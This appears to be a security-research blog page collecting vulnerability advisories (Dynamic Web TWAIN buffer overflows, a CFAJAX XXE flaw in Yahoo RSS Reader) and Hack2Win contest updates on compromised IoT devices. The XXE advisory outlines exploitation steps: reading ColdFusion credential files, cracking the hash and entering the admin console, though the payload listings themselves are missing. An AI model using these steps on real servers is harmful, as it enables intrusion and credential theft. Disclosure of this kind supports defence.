SSD Advisory – Dynamic Web TWAIN SDK Vulnerabilities

Introduction
Dynamic Web TWAIN is a TWAIN-based scanning SDK software specifically designed for web applications. With just a few lines of code, you can develop robust applications to scan documents from TWAIN-compatible scanners, edit the scanned images and save them to a file system.

Vulnerability Details
Two security vulnerabilities have been found in Dynamic Web TAWIN:
 

  • DynamicWebTwainCtrl.DynamicWebTwain.1 ActiveXObject SaveAllAsPDF/SaveAsPDF Methods lstrcpyA() Call Stack Buffer Overflow Vulnerability
  • WebTWAINService.exe Service SaveAllAsPDF/SaveAsPDF Methods lstrcpyA() Call Stack Buffer Overflow Vulnerability

Continue reading SSD Advisory – Dynamic Web TWAIN SDK Vulnerabilities

SSD Advisory – Yahoo RSS Reader XXE Vulnerability (CFAJAX)

Vulnerability Description
A vulnerability in the way CFAJAX handles incoming requests allows attackers to cause the program to execute arbitrary code. The vulnerability is present in a few packages that CFAJAX provides, below is an example of exploitation of this vulnerability in Yahoo RSS Reader. The vulnerability is not limited to this software, but to any software that uses CFAJAX.

Unfortunately CFAJAX is no longer maintained (last version came out on Nov 21st 2005), emails sent to the author go unanswered, but it is still found in several web sites we found on the Internet.

Technical Details
The vulnerability is exploited by supplying an XML file to the CFAJAX written program which is vulnerable to an XXE. The XXE vulnerability allows us to read locally stored files, in our example neo-security.xml and password.properties, which we can then crack (through bruteforce) to gain the administrative panel of Coldfusion.

Exploit
1. Send one HTTP POST request to a vulnerable server. Exploit data will not be logged (by default POST request’s payloads don’t get logged), only the URL being accessed.

2. Content of cf-92655311.xml listed below:

3. Content of cdata-xxe.dtd listed below:

4. You should receive a response like this:

4. Extract salt and password values:

5. Now that you have the salt and password. You can crack the password by following these instructions:
Hash is password variable from ./lib/password.properties.
Salt is admin.userid.root.salt variable from ./lib/neo-security.xml

Configuration file for John the Ripper:

6. Recover password and go to admin console (/CFIDE URL)

Hack2Win – 2nd Day and Summary

At the end of day 2 we had a total of 11 people taking place in the hacking contests, with about 30 people watching them hack live. Thank you all!

I’d like to especially mention the skilled security researchers from Korea, who were the ultimate winners of this contest by finding the most impressive vulnerability as selected by the judges.

As a group they were awarded 1st place and won the cash prize.

We are already thinking about next year’s event. It might be fun to change from IP Cameras to other consumer electronics. The IP cameras were not much of a challenge this year with 2 out of the 3 getting hacked, the 3rd getting totally ‘bricked’, not even working after factory reset.

We will keep you posted on the vendor reaction to these vulnerabilities, with updates on fixes they post and of course additional information on what were the researcher’s findings.

Until next year!

Hack2Win – 1st Day Update

Hi,

Thank you everyone that participated, we had quite a few participants trying their skills at hacking various networking and IOT devices. Out of the 9 available devices, 2 were removed after they were completely owned, another one was removed because testing of it caused it to do a factory reset and become unreachable (no IP address). The two devices were ZyXEL Media Server, and D-Link DCS-5222L and the device that became unreachable was Tenvis IPROBOT 3 (TZ100).

The ZyXEL Media Server, which is running firmware V4.70(AFK.1) is currently listed as having no known vulnerabilities which are pre-authentication, but in Hack2Win it was compromised to the extent that root access was achieved to the box.

Likewise the D-Link DCS-5222L running firmware 2.03.01, is also currently lists no knownpre-authentication vulnerabilities. The camera feed was obtained without any user credentials, and the participant was able to move the camera physically, and caused it to emit annoying sounds.

Once the vulnerabilities are fixed by the vendors, we will publish full technical details for all of them.

The Tenvis IPROBOT 3 (TZ100) vulnerability that allows you to preform a factory reset is related to the web interface. It can be done remotely, and it is a pre-authentication. Unfortunately for the contest participant, the device was no longer accessible so the vulnerability could not be recreated, nor could be considered more than a denial of service – which does not eligible in our contest.

The participant mentioned that the vulnerability is an exploitable buffer overflow in the device (Tenvis IPROBOT 3), and it can be used to gain access to the device. I am sure that tomorrow, after I have a chance to reconfigure the device, they will be able to repeat the process and get it qualified for a prize – assuming it is more than a denial of service.